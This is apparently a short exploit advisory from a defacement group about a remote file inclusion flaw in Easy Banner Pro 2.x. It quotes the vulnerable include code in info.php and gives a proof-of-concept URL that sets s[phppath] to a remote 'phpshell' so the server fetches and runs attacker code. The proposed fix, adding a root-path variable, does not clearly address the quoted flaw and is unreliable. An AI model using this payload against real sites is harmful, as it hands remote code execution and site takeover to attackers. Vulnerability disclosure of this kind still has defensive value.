±-------------------------------------------------------------------
Easy Banner Pro Version 2.* <= Remote File Inclusion
±-------------------------------------------------------------------
Affected Software .: Easy Banner Pro Version
Venedor …: http://www.phpwebscripts.com/
Class …: Remote File Inclusion
Risk …: high (Remote File Execution)
Found by …: rUnViRuS
Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
Contact …: stormhacker[at]hotmail[.]com
±-------------------------------------------------------------------
Code info.php:
…
include('./functions.php');
include_once("$s[phppath]/data/messages.php");
if (!$s[nocron]) include_once("$s[phppath]/rebuild_f.php");
include('./data/time.php');
…
±-------------------------------------------------------------------
$s[phppath] is not properly sanitized before being used.
The bug is in the "PDD" Package for PHPSelect Web Development Division.
±-------------------------------------------------------------------
Solution:
Add this line to your php-file:
$Application_Root ="user/dir" //Your root path
±-------------------------------------------------------------------
PoC:
http://[target]/info.php?s[phppath]=http://phpshell
±-------------------------------------------------------------------
[W]orld [D]efacers [T]eam
Greets:
|| rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
|| Pro Hacker ||
±------------------------[ W D T ]----------------------------------